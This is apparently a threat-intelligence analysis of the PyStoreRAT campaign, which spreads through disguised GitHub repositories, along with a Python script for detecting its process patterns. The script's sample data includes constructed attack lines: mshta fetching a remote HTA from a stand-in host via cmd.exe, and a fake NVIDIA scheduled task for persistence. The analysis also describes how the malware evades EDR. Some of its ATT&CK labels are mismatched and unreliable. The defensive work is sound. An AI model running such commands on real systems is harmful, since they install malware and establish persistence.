Full Report
Cybersecurity researchers are calling attention to a new campaign that's leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. "These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing
Analysis Summary
# Tool/Technique: PyStoreRAT
## Overview
PyStoreRAT is a previously undocumented, modular, multi-stage, JavaScript-based Remote Access Trojan (RAT) distributed via compromised GitHub repositories disguised as development utilities, OSINT tools, or GPT wrappers. Its primary purpose is to establish a persistent foothold, exfiltrate sensitive information (especially cryptocurrency wallet data), and download subsequent stages of malware.
## Technical Details
- Type: Malware (Remote Access Trojan - RAT)
- Platform: Windows (implied by execution via `mshta.exe` and by the use of native Windows binaries such as `cmd.exe`, `rundll32.exe`, and PowerShell)
- Capabilities: Modular execution (EXE, DLL, PowerShell, MSI, JS, HTA), system profiling, cryptocurrency wallet credential harvesting, execution evasion techniques.
- First Seen: Earliest signs of the campaign date back to mid-June 2025.
## MITRE ATT&CK Mapping
- T1566 - Phishing: Supply Chain Compromise
  - T1566.001 - Spearphishing Attachment (Leveraging trust in GitHub repositories)
- T1189 - Drive-by Compromise (Leveraging user trust to download/execute code)
- T1059 - Command and Scripting Interpreter
  - T1059.003 - Windows Command Shell (Using `cmd.exe`)
  - T1059.005 - Visual Basic (HTA execution utilizes embedded scripts)
  - T1059.006 - PowerShell
- T1204 - User Execution
  - T1204.002 - Malicious File
- T1071 - Application Layer Protocol
  - T1071.001 - Web Protocols (C2 communication)
- T1027 - Obfuscated Files or Information (Execution of modules in memory)
- T1053 - Scheduled Task/Job
  - T1053.005 - Scheduled Task
- T1049 - System Network Connections Discovery (Implied by system profiling)
- T1082 - System Information Discovery (System profiling)
- T1041 - Exfiltration Over C2 Channel (Final stage functionality)
## Functionality
### Core Capabilities
- **Initial Infection Chain:** Leverages Python/JavaScript loader stubs embedded in compromised GitHub repositories to silently download and execute a remote HTML Application (HTA) file via `mshta.exe`.
- **Modular Execution:** Capable of downloading and executing various payload formats, including EXE, DLL, PowerShell scripts, MSI packages, and raw JavaScript code.
- **Persistence:** Establishes persistence via a scheduled task disguised as an NVIDIA application self-update mechanism.
- **Information Stealing:** Specifically scans systems for files associated with cryptocurrency wallets (Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02).
### Advanced Features
- **Execution Evasion:** Attempts to reduce visibility by checking for the presence of security products like CrowdStrike Falcon ("Falcon") or Cybereason/ReasonLabs ("Reason"). If detected, it launches `mshta.exe` through an intermediate `cmd.exe` process; otherwise, it executes `mshta.exe` directly.
- **In-Memory Script Execution:** Can fetch raw JavaScript code and execute it dynamically using `eval()`.
- **Second-Stage Delivery:** Can spawn a secondary `mshta.exe` process to load additional HTA payloads.
- **Lateral Movement:** Capable of spreading via removable drives by replacing legitimate documents with malicious Windows Shortcut (.LNK) files.
## Indicators of Compromise
- File Hashes: Not provided in the text.
- File Names: Not explicitly provided, but initial artifacts involve HTA files.
- Registry Keys: Not specified (Persistence relies on Scheduled Tasks).
- Network Indicators: Contacts an external server in the final stage to fetch commands. (Specific C2 domains were not listed/defanged).
- Behavioral Indicators:
  - Execution of remote HTA files via `mshta.exe`.
  - Creation of a scheduled task disguised as an NVIDIA update.
  - Use of `cmd.exe` to invoke `mshta.exe` when EDR evasion is triggered.
  - Scanning for specific crypto wallet directory structures.
  - Dynamic execution of PowerShell commands in memory.
## Associated Threat Actors
- Unknown, but initial analysis suggests a threat actor of likely **Eastern European origin** due to the presence of Russian-language artifacts and coding patterns.
## Detection Methods
- Signature-based detection: Detection for the specific file hashes of downloaded payloads (once obtained).
- Behavioral detection: Monitor for unusual execution chains involving Python/JS loaders, downloads of HTA files from unfamiliar GitHub origins, and `mshta.exe` invocations examined with process lineage checks (including `mshta.exe` launched through an intermediate `cmd.exe`); in particular, alert on the creation of persistence mechanisms disguised as NVIDIA updates.
- YARA rules: Not available based on the provided text.
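To show how the behavioral checks above translate into detection logic, here is an added Python example (not code from the report or from the researchers) that walks Sysmon-style process-creation events and flags the three lineage and persistence patterns described for PyStoreRAT. The event fields, the sample command lines, the `example.invalid` URL and the task-name heuristic are all constructed assumptions for illustration, not observed indicators.

```python
import re
from collections import namedtuple

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
Event = namedtuple("Event", "pid ppid image cmdline")
SAMPLE_EVENTS = [
    Event(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(200, 100, r"C:\Python311\python.exe", "python.exe osint_tool.py"),
    Event(300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c mshta.exe https://example.invalid/stage1.hta"),
    Event(400, 300, r"C:\Windows\System32\mshta.exe", "mshta.exe https://example.invalid/stage1.hta"),
    Event(500, 400, r"C:\Windows\System32\schtasks.exe",
          r'schtasks.exe /create /tn "NVIDIA App SelfUpdate" /tr "mshta.exe C:\Users\u\AppData\Local\Temp\u.hta" /sc minute /mo 5'),
    # Benign control: the real NVIDIA app launched by the user, which must not alert.
    Event(600, 100, r"C:\Program Files\NVIDIA Corporation\NVIDIA app\NVIDIA app.exe", '"NVIDIA app.exe"'),
]

# Script hosts that the report names as loader stubs (Python) plus common equivalents (assumption).
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "wscript.exe", "cscript.exe", "node.exe"}

def lineage(events, pid):
    """Return the chain of image basenames from pid up to the root, child first."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image.rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid].ppid
    return chain

def detect(events):
    """Return (rule, pid) pairs for events matching the PyStoreRAT behaviors above."""
    alerts = []
    for e in events:
        name = e.image.rsplit("\\", 1)[-1].lower()
        ancestors = lineage(events, e.pid)[1:]
        # Rule 1: mshta.exe handed a remote URL (remote HTA execution).
        if name == "mshta.exe" and re.search(r"https?://", e.cmdline, re.I):
            alerts.append(("mshta_remote_hta", e.pid))
        # Rule 2: mshta.exe reached through cmd.exe with a script host further up (the evasion path).
        if name == "mshta.exe" and "cmd.exe" in ancestors and SCRIPT_HOSTS & set(ancestors):
            alerts.append(("mshta_via_cmd_from_script_host", e.pid))
        # Rule 3: schtasks /create with an NVIDIA-themed name whose action is a script host (heuristic).
        if name == "schtasks.exe" and re.search(r"/create", e.cmdline, re.I):
            tn = re.search(r'/tn\s+"?([^"/]+)', e.cmdline, re.I)
            tr = re.search(r'/tr\s+"?([^"]+)', e.cmdline, re.I)
            if tn and tr and "nvidia" in tn.group(1).lower() and \
                    re.match(r"\s*(mshta|powershell|wscript|cscript|cmd)", tr.group(1), re.I):
                alerts.append(("nvidia_lookalike_task_script_action", e.pid))
    return alerts

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The benign NVIDIA app event is included so the task-name rule can be checked against a false-positive case: it fires only on a task whose action is a script host, not on a signed vendor binary.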
## Mitigation Strategies
- **Source Trust Assessment:** Exercise extreme caution when downloading and executing code, even from seemingly trusted platforms like GitHub, especially for utilities promising advanced features (OSINT, AI/GPT tools).
- **Execution Control:** Restrict or tightly control the execution of HTA files through application allow-listing policies.
- **Script Execution Monitoring:** Implement strong monitoring for script interpreters (`mshta.exe`, PowerShell) spawning from unexpected parent processes or performing direct network connections.
- **Privilege Separation:** Ensure standard users do not have system-level privileges that would allow persistent malware installation.
- **Evasion Rule Awareness:** Harden monitoring against common evasion techniques, such as checking for common EDR strings ("Falcon," "Reason") preceding execution decisions.
## Related Tools/Techniques
- Rhadamanthys: Deployed as a follow-on payload (information stealer).
- Stargazers Ghost Network: Similar social engineering/platform manipulation technique used to boost repository visibility.
- Modular, script-based implants seeking to adapt to security controls.